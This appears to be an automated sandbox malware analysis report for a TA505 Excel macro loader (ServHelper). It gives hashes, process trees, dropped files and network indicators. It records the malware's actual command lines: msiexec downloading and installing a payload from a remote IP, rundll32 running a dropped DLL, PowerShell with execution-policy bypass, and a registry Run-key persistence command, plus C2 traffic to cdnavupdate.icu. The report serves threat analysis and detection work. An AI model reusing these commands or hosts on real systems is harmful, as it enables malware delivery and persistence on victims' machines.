analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

D2398-0321_.xls

Full analysis: https://app.any.run/tasks/6de617a1-ffab-454d-931b-d90a9280e8bc
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 22, 2019, 09:50:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
loader
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Thu Mar 21 06:42:52 2019, Security: 0
MD5:

003277DA9690A749396DF9E3F51DF540

SHA1:

CCD62C42C80689A5B3DA7840F8770FFFBFDBC8C0

SHA256:

8E220396AB56096569DB278068738B65354521F4A5FB5073B626897FC0A54AC0

SSDEEP:

3072:LKpb8rGYrMPelwhKmFV5xtezEsgrdgWeEASNPzAKgncusE3v:LKpb8rGYrMPelwhKmFV5xtuEsgrdgWX2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 128)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 128)
    • Downloads executable files from IP

      • msiexec.exe (PID: 4068)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 4068)
    • Application was dropped or rewritten from another process

      • nsA10C.tmp (PID: 2916)
    • Loads dropped or rewritten executable

      • rundll32.exe (PID: 2136)
    • Changes the autorun value in the registry

      • reg.exe (PID: 1528)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2128)
  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 4068)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 4068)
      • MSIA012.tmp (PID: 2180)
    • Starts application with an unusual extension

      • MSIA012.tmp (PID: 2180)
    • Starts CMD.EXE for commands execution

      • nsA10C.tmp (PID: 2916)
      • rundll32.exe (PID: 2136)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 3996)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3052)
    • Creates files in the user directory

      • powershell.exe (PID: 2392)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 128)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 4068)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 4068)
    • Loads dropped or rewritten executable

      • MSIA012.tmp (PID: 2180)
    • Application was dropped or rewritten from another process

      • MSIA012.tmp (PID: 2180)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Листы
  • 1
  • Макросы Excel 4.0
  • 1
TitleOfParts:
  • 1
  • 2
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: Microsoft Corporation
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2019:03:21 06:42:52
CreateDate: 2018:12:19 10:42:12
Software: Microsoft Excel
LastModifiedBy: 1
Author: Microsoft Office
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
11
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msia012.tmp nsa10c.tmp no specs cmd.exe no specs rundll32.exe cmd.exe no specs powershell.exe no specs cmd.exe no specs reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
128"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2216msiexec.exe RETURN=185 /i http://169.239.128.104/alg /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
4068C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2180"C:\Windows\Installer\MSIA012.tmp"C:\Windows\Installer\MSIA012.tmp
msiexec.exe
User:
admin
Company:
hepsu burda
Integrity Level:
MEDIUM
Description:
hepsu burda Application
Version:
1.0.2.1
2916"C:\Users\admin\AppData\Local\Temp\nsvA10B.tmp\nsA10C.tmp" "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Users\admin\AppData\Local\Temp\nsvA10B.tmp\nsA10C.tmpMSIA012.tmp
User:
admin
Integrity Level:
MEDIUM
3996"cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\cmd.exensA10C.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2136rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\rundll32.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2128cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1C:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2392powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3052cmd.exe /C reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 %temp%\xmlparse.dll, sega" /fC:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 042
Read events
935
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
4
Text files
10
Unknown types
4

Dropped files

PID
Process
Filename
Type
128EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8A55.tmp.cvr
MD5:
SHA256:
4068msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF06741638ED56C0D8.TMP
MD5:
SHA256:
2392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AGQKW0ROU54M92G41YDO.temp
MD5:
SHA256:
4068msiexec.exeC:\Windows\Installer\MSI97D2.tmpexecutable
MD5:D4C11BDA021113CA4604D80896B2A492
SHA256:AE2B1B1F7265386EDBBF2617084F277CDB9BC5AC34BD9AAC00CBC77A6BDCD829
4068msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:6449EC21E49BC3204CBE2185C8D19ECB
SHA256:2FCB94FF0A569F66142400F006697B191C4B7DF30843DA58B078E7B48BF317D2
2136rundll32.exeC:\Users\admin\AppData\Local\Temp\enu.ps1text
MD5:6D3EA32EB833D773CBF7B7119AA384AD
SHA256:DA7465F14CD8A934668F59974E8836E02A9B1FF948BFE964040B840AB61697DC
2180MSIA012.tmpC:\Users\admin\AppData\Local\Temp\xmlparse.dllexecutable
MD5:6675C63A2534FD65B3B2DA751F2B393F
SHA256:BEE3B2710F7E874CE05E6B8B45CC20E021B9C00EE337238598E71E7315128333
4068msiexec.exeC:\Windows\Installer\MSI9EB8.tmpbinary
MD5:AC8E12F17725072A024109154A2D2234
SHA256:08816FA709042FF31535740B5FCCB69DA0D2BC56EA8E44AE4A00E0C82F3DF976
4068msiexec.exeC:\Users\admin\AppData\Local\Temp\Cookies\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
2392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfdf3b.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4068
msiexec.exe
GET
200
169.239.128.104:80
http://169.239.128.104/alg
ZA
executable
396 Kb
suspicious
2136
rundll32.exe
POST
200
179.43.156.37:80
http://cdnavupdate.icu/jquery/jquery.php
CH
text
140 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2136
rundll32.exe
179.43.156.37:80
cdnavupdate.icu
Private Layer INC
CH
suspicious
4068
msiexec.exe
169.239.128.104:80
Zappie Host LLC
ZA
suspicious

DNS requests

Domain
IP
Reputation
cdnavupdate.icu
  • 179.43.156.37
malicious

Threats

PID
Process
Class
Message
4068
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
4068
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
2136
rundll32.exe
A Network Trojan was detected
MALWARE [PTsecurity] ServHelper (TA505)
2136
rundll32.exe
Potentially Bad Traffic
ET INFO HTTP POST Request to Suspicious *.icu domain
2136
rundll32.exe
A Network Trojan was detected
MALWARE [PTsecurity] ServHelper Shell command (TA505)
1 ETPRO signatures available at the full report
No debug info